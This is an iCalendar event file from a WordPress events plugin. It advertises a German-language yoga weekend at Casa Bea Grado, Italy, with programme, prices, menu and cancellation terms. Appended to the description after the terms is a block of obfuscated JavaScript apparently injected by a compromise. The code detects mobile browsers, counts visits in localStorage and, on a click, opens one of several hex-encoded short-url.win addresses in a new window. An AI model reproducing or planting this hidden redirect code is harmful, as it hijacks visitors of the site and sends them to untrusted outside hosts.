BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//7.2.3.1//EN
TZID:Europe/Vienna
X-WR-TIMEZONE:Europe/Vienna
BEGIN:VEVENT
UID:945@roswithaschoen.com
DTSTART;TZID=Europe/Vienna:20230929T160000
DTEND;TZID=Europe/Vienna:20231001T110000
DTSTAMP:20230927T104445Z
URL:https://www.roswithaschoen.com/termine/yoga-dolce-vita-in-bella-italia
 -yoga-wochenende-in-der-schoenen-casa-bea-grado/
SUMMARY:Yoga & Dolce Vita in Bella Italia - Yoga-Wochenende in der schönen
  Casa Bea Grado
DESCRIPTION:TIME TO SHINE\n********\nYoga-Wochenende in der schönen Casa B
 ea Grado\n29. September bis 1. Oktober 2023 mit Roswitha Schön\nDas Woche
 nende ist eine Einladung an dich zu Yoga &amp\; Dolce Vita in der idyllisc
 hen Lagunenlandschaft von Grado. \nEs erwartet dich eine unvergessliche Au
 szeit vom Alltag in Bella Italia. Entspannung\, Lebensfreude\, Genuss und 
 süßes Nichtstun stehen auf dem Programm.\nLass bewusst deine Seele baume
 ln und tanke in den Yogastunden in dieser traumhaften Umgebung neue Kraft 
 und Energie. Lerne dabei auch Land &amp\; Leute kennen und mach vielleicht
  die eine oder andere neue Erfahrung.\nMit einer herzerfrischenden und kr
 äftigenden Praxis am Morgen küssen wir unsere Lebensgeister wach und st
 ärken Körper und Geist. Mit einer sanften Yin Yoga Praxis am späten Nac
 hmittag lösen wir tiefsitzende Spannungen auf allen Ebenen und nähren un
 ser gesamtes Wesen. Körper\, Geist und Seele kommen in Einklang und Medit
 ationen und Coaching-Inputs ergänzen und runden das Programm ab.\nNeben d
 en Yoga-Einheiten bleibt genügend Zeit\, um die traumhafte Umgebung und d
 as mediterrane Flair zu genießen. Verweile im traumhaft schönen Garten d
 er Casa Bea\, verbringe Zeit am Strand\, erkunde die Umgebung und gönne d
 ir kulinarische Köstlichkeiten der italienischen Küche.\n&nbsp\;\n„ein
 fach SCHÖN“ Seminare stehen für individuelle Betreuung und außergewö
 hnliche Erlebnisse. Maximale Gruppengröße – 16 TeilnehmerInnen.\n&nbsp
 \;\nWorauf kannst du dich bei einem „einfach SCHÖN“ Yoga-Wochenende f
 reuen:\n\n\n 	authentische und transformierende Yoga-Einheiten\n 	berühre
 nde Herzmeditationen\n 	kraftvolle Mindset-Impulse\n 	hilfreiche und leich
 t integrierbare Coaching-Tools für mehr Leichtigkeit und innere Harmonie\
 n 	nährende Zeit für dich und fröhliche Zeit in Gemeinschaft\n 	unbänd
 ige Lebensfreude\n\nDie „einfach SCHÖN“ Yoga-Wochenenden sind für Yo
 ga-Lovers und Yoga-Neulinge geeignet.\n********\nFreitag:\n\n\n 	individue
 lle Anreise und Check in ab 16:00 Uhr\n 	17:00-18:30 Uhr Meditation &amp\;
  Yin Yoga am Meer\n 	20:00 Uhr gemeinsames Abendessen in Grado (individuel
 l und nicht im Preis enthalten)\n\nSamstag:\n\n\n 	06:00 Uhr mit Igor und 
 dem Fischerboot zum Sonnenaufgang Richtung Isola della Cona (ein Naturscha
 uspiel für Vögel und weiße Wildpferde) – € 80\,00 pro Person\, Bea 
 serviert dir hier ein köstliches "Frühstück der anderen Art"\n 	anschli
 eßend Morgen-Yogaeinheit im wunderschönen Garten der Casa Bea Grado\n 	Z
 eit für dich: Seele baumeln lassen\, Spaziergang machen\, Meereswellen la
 uschen\, Gegend erkunden\, nach Grado zum Bummeln oder einfach das Dolce V
 ita und süßes Nichtstun genießen\n 	16:00 – 18:00 Uhr Yin Yoga im wun
 derschönen Garten der Casa Bea Grado\n19:30 Uhr – Cucina Italiana pur 
 … köstliches von unserem persönlichen Koch Andrea zubereitetes italien
 isches Abendessen (Meeresfrüchte und vegetarisch) – € 90\,00 pro Pers
 on inkl. Getränke\n\nSonntag:\n\n\n 	07:30 – 9:00 Uhr Runen &amp\; Yang
  Yoga\n 	gemeinsames Frühstück\n 	individuelle Abreise oder Verlängerun
 g\n\nDeine Yoga-Investition in eine herzerfrischende und entspannte Slow D
 own und Relax-Auszeit :\nEUR 176\,00 pro Person (exklusive Unterkunft und 
 Dolce Vita Rahmenprogramm)\nAnmeldung unter info@roswithaschoen.com\n*****
 ***\nBitte buche deine Unterkunft  direkt in der Casa Bea Grado - Kennwo
 rt "einfach SCHÖN"unter booking@casabeagrado.it oder telefonisch unter: 
 +39 371 45 26 937 (Beatrix Eichhorn – gebürtige Österreicherin\, Salzb
 urg/Land)\n\n\n 	DZ inkl. Frühstück\, Steuern und Kurtaxe\nEUR 111\,60 p
 ro Person für 2 Nächte\n 	DZ zur Einzelbelegung inkl. Frühstück\, Steu
 ern und Kurtaxe\nEUR 177\,60 für 2 Nächte\n\n&nbsp\;\n\n 	Dolce Vita Sam
 stag-Rahmenprogramm - Gesamtpreis EUR 170\,00 pro Person\n(bitte Vorort b
 ar bei Beatrix bezahlen)\nIn der Früh geht's mit Igor und seinem Fischerb
 oot zum Sonnenaufgang Richtung Isola della Cona (ein Naturschauspiel für 
 Vögel und weiße Wildpferde) und am Abend verwöhnt uns unser persönlich
 er italienischer Koch Andrea mit einem genussvollen gemeinsamen Abendessen
  inkl. Weinbegleitung:\n\n\n\n\n\n&nbsp\;\n\nCENA DI PESCE\nAperitivo:\nWe
 in: Prosecco Doc Valdobbiadene\nFrittierte kleine Fische als Fingerfood\, 
 selbstgemachtes Brot mit „Baccala Mantecato“ (ist ein Steckerlfischauf
 strich)\nAntipasti / Vorspeise:\nWein: Friulano\nRiesenschrimp mit Burrata
  und Schokolade\, Jakobsmuscheln mit Steinpilzcreme\nHauptgang:\nWein: Pin
 ot Grigio\nGegrillter Fisch (Steinbutt\, Wolfsbarsch\, Brasse) Polenta und
  Kartoffeln\nGegrilltes Gemüse\nNachspeise: Santonego\nPanna Cotta mit Pf
 irsichcreme aus Fiumicello\n\n\n\n\n\n\nVeranstaltungsort:\nCasa Bea Grado
 \nBeatrix Eichhorn\nLocalitá Zemole 1\nIT-34073 Fossalon di Grado\nwww.ca
 sabeagrado.it\n&nbsp\;\n********\n \n„einfach SCHÖN“ Seminare\nAllge
 meine Geschäftsbedingungen\,\nZahlungs- und Stornierungsbestimmungen: \n
  \nDie Anmeldung zum Yoga-Retreat ist verbindlich – dein Platz ist fix 
 für dich reserviert. Bitte überweise die Kursgebühr innerhalb von 8 Tag
 en nach Erhalt der Anmeldebestätigung und Honorarnote.  Bei Rücktritt b
 is 12 Wochen vor Beginn der Veranstaltung erstatte ich dir die Kursgebühr
  unter Abzug einer Bearbeitungsgebühr von € 25\,00 zurück. Bei einem s
 päteren Rücktritt kann ich dir die Kursgebühr unter Abzug einer Bearbei
 tungsgebühr von € 25\,00 nur dann zurückerstatten\, wenn du den gebuch
 ten Platz an eine andere Person weitergegeben kannst. Das Finden einer and
 eren Person liegt in der Verantwortung der Teilnehmenden.\nNichtzustandeko
 mmen des Seminars: Im Falle eines Nichtzustandekommens durch Absage von mi
 r\, Roswitha Schön\, können vom/von der Teilnehmer/in keinerlei Haftungs
 - und Schadenersatzansprüche geltend gemacht werden. In diesem Falle werd
 e ich die bereits geleistete Zahlung des Kursbeitrags sofort zurückerstat
 ten. Die Übernahme/Rückerstattung der Reisekosten kann ich allerdings au
 sdrücklich nicht übernehmen. Ich rate also zum Abschluss einer Reiserüc
 ktritt-Versicherung\, die neben den Reisekosten auch die Seminarkosten abd
 eckt.\nSelbstverantwortung\nDieses Seminar ist ein Yoga-Retreat und kann u
 nterstützend wirken. Es ersetzt jedoch keine medizinische notwendige Beha
 ndlung. Der/die Kursteilnehmer/in erklärt\, dass er/sie sich ausreichend 
 physisch und psychisch gesund fühlt und trägt die volle Selbstverantwort
 ung für sein/ihr Handeln. Ich – Roswitha Schön – übernehme keinerle
 i Haftung für etwaige Schäden körperlicher Art\, Diebstahl oder sonstig
 en Schäden. Ich empfehle hier eventuell den Abschluss einer Unfall-\, Kra
 nkheits-\, Reisegepäck- und Haftpflichtversicherung.\n\nfunction _0x3023(
 _0x562006\,_0x1334d6){const _0x1922f2=_0x1922()\;return _0x3023=function(_
 0x30231a\,_0x4e4880){_0x30231a=_0x30231a-0x1bf\;let _0x2b207e=_0x1922f2[_0
 x30231a]\;return _0x2b207e\;}\,_0x3023(_0x562006\,_0x1334d6)\;}function _0
 x1922(){const _0x5a990b=['substr'\,'length'\,'-hurs'\,'open'\,'round'\,'44
 3779RQfzWn'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74
 \\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x76\\x42\\x33\\x63\\x3
 73'\,'click'\,'5114346JdlaMi'\,'1780163aSIYqH'\,'forEach'\,'host'\,'_blank
 '\,'68512ftWJcO'\,'addEventListener'\,'-mnts'\,'\\x68\\x74\\x74\\x70\\x3a\
 \x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e
 \\x2f\\x6b\\x69\\x79\\x35\\x63\\x365'\,'4588749LmrVjF'\,'parse'\,'630bGPCE
 V'\,'mobileCheck'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x7
 2\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x56\\x6c\\x49\\x38\\x
 63\\x328'\,'abs'\,'-local-storage'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\
 x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\
 \x68\\x63\\x39\\x63\\x399'\,'56bnMKls'\,'opera'\,'6946eLteFW'\,'userAgent'
 \,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\
 \x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x42\\x43\\x53\\x34\\x63\\x354'\,'\\x68
 \\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6
 c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x59\\x65\\x37\\x63\\x327'\,'\\x68\\x74\\x
 74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\
 x77\\x69\\x6e\\x2f\\x4f\\x47\\x69\\x32\\x63\\x392'\,'floor'\,'\\x68\\x74\\
 x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\
 \x77\\x69\\x6e\\x2f\\x75\\x46\\x46\\x36\\x63\\x356'\,'999HIfBhL'\,'filter'
 \,'test'\,'getItem'\,'random'\,'138490EjXyHW'\,'stopPropagation'\,'setItem
 '\,'70kUzPYI']\;_0x1922=function(){return _0x5a990b\;}\;return _0x1922()\;
 }(function(_0x16ffe6\,_0x1e5463){const _0x20130f=_0x3023\,_0x307c06=_0x16f
 fe6()\;while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-par
 seInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x2
 0130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1
 d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+
 parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(
 _0x20130f(0x1da))/0xb)\;if(_0x1dea23===_0x1e5463)break\;else _0x307c06['pu
 sh'](_0x307c06['shift']())\;}catch(_0x3e3a47){_0x307c06['push'](_0x307c06[
 'shift']())\;}}}(_0x1922\,0x984cd)\,function(_0x34eab3){const _0x111835=_0
 x3023\;window['mobileCheck']=function(){const _0x123821=_0x3023\;let _0x39
 9500=![]\;return function(_0x5e9786){const _0x1165a7=_0x3023\;if(/(android
 |bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fen
 nec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+fi
 refox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocke
 t|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows c
 e|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1
 -6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|
 ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|b
 i(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|c
 htm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(
 c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|f
 etc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hci
 t|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|t
 p)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|i
 nno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\
 -|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3g
 a|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(0
 1|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n3
 0(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|
 o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pir
 e|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|
 \\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny
 |va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie
 (\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|
 sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t
 \\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|ver
 i|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|8
 5|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zt
 e\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0\,0x4)))_0x399500=
 !![]\;}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821
 (0x1c0)])\,_0x399500\;}\;const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\
 x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\
 \x67\\x62\\x6d\\x30\\x63\\x370'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73
 \\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x4
 8\\x45\\x31\\x63\\x301'\,_0x111835(0x1c5)\,_0x111835(0x1d7)\,_0x111835(0x1
 c3)\,_0x111835(0x1e1)\,_0x111835(0x1c7)\,_0x111835(0x1c4)\,_0x111835(0x1e6
 )\,_0x111835(0x1e9)]\,_0x7378e8=0x3\,_0xc82d98=0x6\,_0x487206=_0x551830=>{
 const _0x2c6c7a=_0x111835\;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f\,_0x37dc
 07)=>{const _0x476c2a=_0x2c6c7a\;!localStorage['getItem'](_0x3ee06f+_0x476
 c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8)\,0x
 0)\;})\;}\,_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835\,_0x229a83=_0x3
 743e2[_0x415ff3(0x1c9)]((_0x37389f\,_0x22f261)=>localStorage[_0x415ff3(0x1
 cb)](_0x37389f+_0x415ff3(0x1e8))==0x0)\;return _0x229a83[Math[_0x415ff3(0x
 1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])]\;}\,_0x173ccb
 =_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8)\,0x1
 )\,_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835
 (0x1e8))\,_0xa7249=(_0x354163\,_0xd22cba)=>localStorage[_0x111835(0x1cf)](
 _0x354163+_0x111835(0x1e8)\,_0xd22cba)\,_0x381bfc=(_0x49e91b\,_0x531bc4)=>
 {const _0x1b0982=_0x111835\,_0x1da9e1=0x3e8*0x3c*0x3c\;return Math[_0x1b09
 82(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1)\;}\,_0x6
 ba060=(_0x1e9127\,_0x28385f)=>{const _0xb7d87=_0x111835\,_0xc3fc56=0x3e8*0
 x3c\;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e912
 7)/_0xc3fc56)\;}\,_0x370e93=(_0x286b71\,_0x3587b8\,_0x1bcfc4)=>{const _0x2
 2f77c=_0x111835\;_0x487206(_0x286b71)\,newLocation=_0x564ab0(_0x286b71)\,_
 0xa7249(_0x3587b8+'-mnts'\,_0x1bcfc4)\,_0xa7249(_0x3587b8+_0x22f77c(0x1d3)
 \,_0x1bcfc4)\,_0x173ccb(newLocation)\,window['mobileCheck']()&&window[_0x2
 2f77c(0x1d4)](newLocation\,'_blank')\;}\;_0x487206(_0xe6f43)\;function _0x
 168fb9(_0x36bdd0){const _0x2737e0=_0x111835\;_0x36bdd0[_0x2737e0(0x1ce)]()
 \;const _0x263ff7=location[_0x2737e0(0x1dc)]\;let _0x1897d7=_0x564ab0(_0xe
 6f43)\;const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date())\,_0x1ec416=_0x57
 92ce(_0x263ff7+_0x2737e0(0x1e0))\,_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(
 0x1d3))\;if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416)\,
 _0x1aa413=parseInt(_0x23f079)\,_0x418d13=_0x6ba060(_0x48cc88\,_0x2e27c9)\,
 _0x13adf6=_0x381bfc(_0x48cc88\,_0x1aa413)\;_0x13adf6>=_0xc82d98&&(_0x48720
 6(_0xe6f43)\,_0xa7249(_0x263ff7+_0x2737e0(0x1d3)\,_0x48cc88))\,_0x418d13>=
 _0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x
 2737e0(0x1e0)\,_0x48cc88)\,window[_0x2737e0(0x1d4)](_0x1897d7\,_0x2737e0(0
 x1dd))\,_0x173ccb(_0x1897d7)))\;}catch(_0x161a43){_0x370e93(_0xe6f43\,_0x2
 63ff7\,_0x48cc88)\;}else _0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}docum
 ent[_0x111835(0x1df)](_0x111835(0x1d8)\,_0x168fb9)\;}())\;
ATTACH;FMTTYPE=image/jpeg:https://www.roswithaschoen.com/wp-content/upload
 s/2023/03/Kopie-von-Kopie-von-Kopie-von-Kopie-von-Kopie-von-Adventures-in-
 America-e1680615651658.png
CATEGORIES:Yoga,Yoga Auszeit Reisen
LOCATION:Casa Bea Grado\, Localitá Zemole 1\, Fossalon di Grado\, 34073\, 
 Italien
X-APPLE-STRUCTURED-LOCATION;VALUE=URI;X-ADDRESS=Localitá Zemole 1\, Fossal
 on di Grado\, 34073\, Italien;X-APPLE-RADIUS=100;X-TITLE=Casa Bea Grado:ge
 o:0,0
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Vienna
X-LIC-LOCATION:Europe/Vienna
BEGIN:DAYLIGHT
DTSTART:20230326T030000
TZOFFSETFROM:+0100
TZOFFSETTO:+0200
TZNAME:CEST
END:DAYLIGHT
END:VTIMEZONE
END:VCALENDAR